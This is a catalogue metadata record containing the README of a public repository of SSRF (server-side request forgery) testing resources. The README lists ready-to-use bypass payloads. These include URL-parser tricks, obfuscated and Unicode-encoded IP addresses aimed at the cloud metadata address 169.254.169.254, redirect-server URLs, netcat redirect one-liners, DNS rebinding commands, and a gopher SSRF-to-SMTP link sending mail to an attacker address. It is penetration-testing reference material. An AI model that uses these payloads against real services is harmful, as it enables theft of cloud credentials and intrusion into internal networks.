{"id":13389881,"url":"https://github.com/cujanovic/SSRF-Testing","last_synced_at":"2025-03-13T14:32:17.449Z","repository":{"id":41128736,"uuid":"85674218","full_name":"cujanovic/SSRF-Testing","owner":"cujanovic","description":"SSRF (Server Side Request Forgery) testing resources","archived":false,"fork":false,"pushed_at":"2024-10-12T12:43:21.000Z","size":7283,"stargazers_count":2343,"open_issues_count":0,"forks_count":480,"subscribers_count":73,"default_branch":"master","last_synced_at":"2024-11-03T03:32:21.968Z","etag":null,"topics":["pentest","pentest-tool","pentesting","server-side-request-forgery","ssrf"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/cujanovic.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null}},"created_at":"2017-03-21T07:57:51.000Z","updated_at":"2024-11-03T03:20:55.000Z","dependencies_parsed_at":"2023-01-21T18:00:32.715Z","dependency_job_id":null,"html_url":"https://github.com/cujanovic/SSRF-Testing","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cujanovic%2FSSRF-Testing","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cujanovic%2FSSRF-Testing/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cujanovic%2FSSRF-Testing/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cujanovic%2FSSRF-Testing/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/cujanovic","download_url":"https://codeload.github.com/cujanovic/SSRF-Testing/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243422682,"owners_count":20288500,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["pentest","pentest-tool","pentesting","server-side-request-forgery","ssrf"],"created_at":"2024-07-30T13:01:37.404Z","updated_at":"2025-03-13T14:32:14.639Z","avatar_url":"https://github.com/cujanovic.png","language":"Python","funding_links":["https://www.buymeacoffee.com/cujanovic"],"categories":["Python","Python (1887)"],"sub_categories":[],"readme":"\u003ca href=\"https://www.buymeacoffee.com/cujanovic\" target=\"_blank\"\u003e\u003cimg src=\"https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png\" alt=\"Buy Me A Coffee\" style=\"height: 60px !important;width: 217px !important;\" \u003e\u003c/a\u003e\n\n\n[I'm grateful for the support received by Tuta](https://tuta.com/)\n\n\n# SSRF (Server Side Request Forgery) testing resources\n\n***\n\n### Quick URL based bypasses:\n`http://google.com:80+\u0026@127.88.23.245:22/#+@google.com:80/`\n\n`http://127.88.23.245:22/+\u0026@google.com:80#+@google.com:80/`\n\n`http://google.com:80+\u0026@google.com:80#+@127.88.23.245:22/`\n\n`http://127.88.23.245:22/?@google.com:80/`\n\n`http://127.88.23.245:22/#@www.google.com:80/`\n\n`http://google.com:80\\\\@127.88.23.245:22/`\n\n***\n\n### htaccess - redirect test for various cases\nStatus codes: 300, 301, 302, 303, 305, 307, 308\n\nFiletypes: jpg, json, csv, xml, pdf\n#### Live demo:\njpg 301 response without and with a valid response body:\n\n`https://ssrf.localdomain.pw/img-without-body/301-http-169.254.169.254:80-.i.jpg`\n\n`https://ssrf.localdomain.pw/img-without-body-md/301-http-.i.jpg`\n\n`https://ssrf.localdomain.pw/img-with-body/301-http-169.254.169.254:80-.i.jpg`\n\n`https://ssrf.localdomain.pw/img-with-body-md/301-http-.i.jpg`\n\n\njson 301 response without and with a valid response body:\n\n`https://ssrf.localdomain.pw/json-without-body/301-http-169.254.169.254:80-.j.json`\n\n`https://ssrf.localdomain.pw/json-without-body-md/301-http-.j.json`\n\n`https://ssrf.localdomain.pw/json-with-body/301-http-169.254.169.254:80-.j.json`\n\n`https://ssrf.localdomain.pw/json-with-body-md/301-http-.j.json`\n\n\ncsv 301 response without and with a valid response body:\n\n`https://ssrf.localdomain.pw/csv-without-body/301-http-169.254.169.254:80-.c.csv`\n\n`https://ssrf.localdomain.pw/csv-without-body-md/301-http-.c.csv`\n\n`https://ssrf.localdomain.pw/csv-with-body/301-http-169.254.169.254:80-.c.csv`\n\n`https://ssrf.localdomain.pw/csv-with-body-md/301-http-.c.csv`\n\n\nxml 301 response without and with a valid response body:\n\n`https://ssrf.localdomain.pw/xml-without-body/301-http-169.254.169.254:80-.x.xml`\n\n`https://ssrf.localdomain.pw/xml-without-body-md/301-http-.x.xml`\n\n`https://ssrf.localdomain.pw/xml-with-body/301-http-169.254.169.254:80-.x.xml`\n\n`https://ssrf.localdomain.pw/xml-with-body-md/301-http-.x.xml`\n\npdf 301 response without and with a valid response body:\n\n`https://ssrf.localdomain.pw/pdf-without-body/301-http-169.254.169.254:80-.p.pdf`\n\n`https://ssrf.localdomain.pw/pdf-without-body-md/301-http-.p.pdf`\n\n`https://ssrf.localdomain.pw/pdf-with-body/301-http-169.254.169.254:80-.p.pdf`\n\n`https://ssrf.localdomain.pw/pdf-with-body-md/301-http-.p.pdf`\n\n***\n\n### custom-30x - Custom 30x responses and Location header with PHP\n\n#### Live demo:\n\n`https://ssrf.localdomain.pw/custom-30x/?code=332\u0026url=http://169.254.169.254/\u0026content-type=YXBwbGljYXRpb24vanNvbg==\u0026body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==\u0026fakext=/j.json`\n\n***\n\n### custom-200 - Custom 200 response and Content-Location header with PHP\n\n#### Live demo:\n\n`https://ssrf.localdomain.pw/custom-200/?url=http://169.254.169.254/\u0026content-type=YXBwbGljYXRpb24vanNvbg==\u0026body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==\u0026fakext=/j.json`\n\n***\n\n### custom-201 - Custom 201 response and Location header with PHP\n\n#### Live demo:\n\n`https://ssrf.localdomain.pw/custom-201/?url=http://169.254.169.254/\u0026content-type=YXBwbGljYXRpb24vanNvbg==\u0026body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==\u0026fakext=/j.json`\n\n***\n\n### Minimal web server using netcat\n\n`while true ; do nc -l -p 80 -c 'echo -e \"HTTP/1.1 302 Found\\nContent-Type: application/json\\nLocation: http://169.254.169.254/\\n{\\\"a\\\":\\\"b\\\"}\"'; done`\n\n`export RTSPLOCATION=\"http://169.254.169.254/\"; while true ; do nc -l -p 554 -c 'echo -e \"RTSP/1.0 301 Moved\\nCSeq: 1\\nLocation: $RTSPLOCATION\"'; done`\n\n***\n\n### ip.py - Alternate IP encoding tool useful for SSRF Testing\n\npython ip.py IP PORT WhiteListedDomain EXPORT(optional)\n\npython ip.py 169.254.169.254 80 www.google.com\n\npython ip.py 169.254.169.254 80 www.google.com export\n\n***\n\n### DNS pinning\n\nnslookup ssrf-169.254.169.254.localdomain.pw\n\nnslookup ssrf-cloud.localdomain.pw\n\nhttp://xip.io/\n\nnslookup 169.254.169.254.xip.io\n\nnslookup 1ynrnhl.xip.io\n\nnslookup www.owasp.org.1ynrnhl.xip.io\n\nnslookup 127.127.127.127.xip.io\n\nhttps://nip.io/\n\nnslookup 169.254.169.254.nip.io\n\nnslookup app-169-254-169-254.nip.io\n\nnslookup owasp.org.169.254.169.254.nip.io\n\nnslookup customer2-app-169-254-169-254.nip.io\n\nnslookup 127.127.127.127.nip.io\n\n***\n\n### DNS pinning race condition\n\nnslookup ssrf-race-169.254.169.254.localdomain.pw\n\n***\n\n### DNS Rebinding\n\npip install twised\n\npython3 dns.py WhitelistedIP InternalIP ServerIP Port Domain\n\npython3 dns.py 216.58.214.206 169.254.169.254 78.47.24.216 53 localdomains.pw\n\nhttp://webcache.googleusercontent.com/search?q=cache:http://www.611eternity.com/DNSRebinding%E6%8A%80%E6%9C%AF%E5%AD%A6%E4%B9%A0/\n\nDNS Rebinding Exploitation Framework - https://github.com/mwrlabs/dref\n\n***\n\n### cloud-metadata.txt - Cloud Metadata Dictionary useful for SSRF Testing\n\n***\n\n### svg - SSRF with svg files\n\n***\n\n### ffmpeg - SSRF with ffmpeg\n\nhttps://hackerone.com/reports/237381\n\nhttps://hackerone.com/reports/243470\n\nhttps://github.com/neex/ffmpeg-avi-m3u-xbin\n\nhttps://www.blackhat.com/docs/us-16/materials/us-16-Ermishkin-Viral-Video-Exploiting-Ssrf-In-Video-Converters.pdf\n\nhttps://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit#slide=id.g22371f2702_0_15\n\n***\n\n### iframe - SSRF with html iframe + URL bypass\n\n#### Live demo:\n\n`http://ssrf.localdomain.pw/iframe/?proto=http\u0026ip=127.0.0.1\u0026port=80\u0026url=/`\n\n***\n\n### Abusing Enclosed Alphanumerics\n\n`http://169。254。169。254/`\n\n`http://169｡254｡169｡254/`\n\n`http://⑯⑨。②⑤④。⑯⑨｡②⑤④/`\n\n`http://⓪ⓧⓐ⑨｡⓪ⓧⓕⓔ｡⓪ⓧⓐ⑨｡⓪ⓧⓕⓔ:80/`\n\n`http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/`\n\n`http://②⑧⑤②⓪③⑨①⑥⑥:80/`\n\n`http://④②⑤｡⑤①⓪｡④②⑤｡⑤①⓪:80/`\n\n`http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80/`\n\n`http://⓪⓪②⑤①｡⓪⓪⓪③⑦⑥｡⓪⓪⓪⓪②⑤①｡⓪⓪⓪⓪⓪③⑦⑥:80/`\n\n`http://[::①⑥⑨｡②⑤④｡⑯⑨｡②⑤④]:80/`\n\n`http://[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80/`\n\n`http://⓪ⓧⓐ⑨。⓪③⑦⑥。④③⑤①⑧:80/`\n\n`http://⓪ⓧⓐ⑨｡⑯⑥⑧⑨⑥⑥②:80/`\n\n`http://⓪⓪②⑤①。⑯⑥⑧⑨⑥⑥②:80/`\n\n`http://⓪⓪②⑤①｡⓪ⓧⓕⓔ｡④③⑤①⑧:80/`\n\n***\n\n### commonly-open-ports.txt - list of commonly open ports\n\n***\n\n### SSRF2SMTP\n\nhttps://ssrf.localdomain.pw/ssrf2smtp/?proto=gopher\u0026ip=0\u0026port=25\u0026domain=domain.com\u0026to=email@attacker.com\u0026code=301\n\n***\n\n### Schemes-List.xlsx - 800 of known schemas + useful references\n\nhttps://github.com/irsdl/OutlookLeakTest/blob/master/Schemes-List.xlsx?raw=true\n\n***\n\n### Java/Python FTP Injections Allow for Firewall Bypass\n\nhttp://webcache.googleusercontent.com/search?q=cache:http://blog.blindspotsecurity.com/2017/02/advisory-javapython-ftp-injections.html\n\nhttps://github.com/ecbftw/poc/blob/master/java-python-ftp-injection/ftp-injection-server.py\n\nhttp://webcache.googleusercontent.com/search?q=cache:https://shiftordie.de/blog/2017/02/18/smtp-over-xxe/\n\n***\n\n### SSRF + Gopher + Redis\n\nhttp://webcache.googleusercontent.com/search?q=cache:http://vinc.top/2016/11/24/%E3%80%90ssrf%E3%80%91ssrfgopher%E6%90%9E%E5%AE%9A%E5%86%85%E7%BD%91%E6%9C%AA%E6%8E%88%E6%9D%83redis/\n\nhttps://webcache.googleusercontent.com/search?q=cache:http://antirez.com/news/96\n\n***\n\n### Top 5 features that are often prone to SSRF vulnerabilities:\n\nhttps://webcache.googleusercontent.com/search?q=cache:https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF\n\n***\n\n### Joshua Maddux - When TLS Hacks You\n\nhttps://www.youtube.com/watch?v=qGpAJxfADjo\n\nhttps://github.com/jmdx/TLS-poison\n\n***\n\n### AppSecEU15-Server_side_browsing_considered_harmful.pdf\nhttps://www.youtube.com/watch?v=8t5-A4ASTIU\n\n***\n\n### us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf\nhttps://www.youtube.com/watch?v=D1S-G8rJrEk\n\n***\n\n### A tiny and cute URL fuzzer\n\nhttps://github.com/orangetw/Tiny-URL-Fuzzer\n\n***\n\n### Bypassing Server-Side Request Forgery filters by abusing a bug in Ruby's native resolver\n\nhttps://edoverflow.com/2017/ruby-resolv-bug/\n\nhttps://hackerone.com/reports/287245\n\nhttps://hackerone.com/reports/215105\n\n0177.1 =\u003e 127.0.0.1\n\n0x7f.1 =\u003e 127.0.0.1\n\n127.1 =\u003e 127.0.0.1\n\n***\n\n### AWS bypass only\n\nhttp://instance-data/latest/meta-data/\n\n***\n\n### SSRF Tips\nhttp://webcache.googleusercontent.com/search?q=cache:http://blog.safebuff.com/2016/07/03/SSRF-Tips/\n\n***\n\n### PHP SSRF Techniques\nhttps://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51\n\n***\n\n### SSRF bible\nhttps://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM\n\n***\n\n### SSRF Proxy\nhttps://github.com/bcoles/ssrf_proxy\n\nSSRF Proxy facilitates tunneling HTTP communications through servers vulnerable to Server-Side Request Forgery\n\n***\n\n### SSRF via Request Splitting\n\nhttps://www.rfk.id.au/blog/entry/security-bugs-ssrf-via-request-splitting/\n\n***\n\n### Overly Permissive Proxy\nhttps://www.nginx.com/blog/trust-no-one-perils-of-trusting-user-input/\n\ncurl http://remote-ip-address/latest/meta-data/ -H \"Host: 169.154.169.254\"\n\n***\n\n### All you need to know about SSRF and how may we write tools to do auto-detect\nhttps://medium.com/bugbountywriteup/the-design-and-implementation-of-ssrf-attack-framework-550e9fda16ea\n\n***\n\n### Gopherus - This tool generates gopher link for doing SSRF and RCE in various servers\nhttps://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/\n\n***\n\n### A Glossary of Blind SSRF Chains\nhttps://blog.assetnote.io/2021/01/13/blind-ssrf-chains/\n\n***\n\n\u003ca href=\"https://www.buymeacoffee.com/cujanovic\" target=\"_blank\"\u003e\u003cimg src=\"https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png\" alt=\"Buy Me A Coffee\" style=\"height: 60px !important;width: 217px !important;\" \u003e\u003c/a\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcujanovic%2FSSRF-Testing","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcujanovic%2FSSRF-Testing","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcujanovic%2FSSRF-Testing/lists"}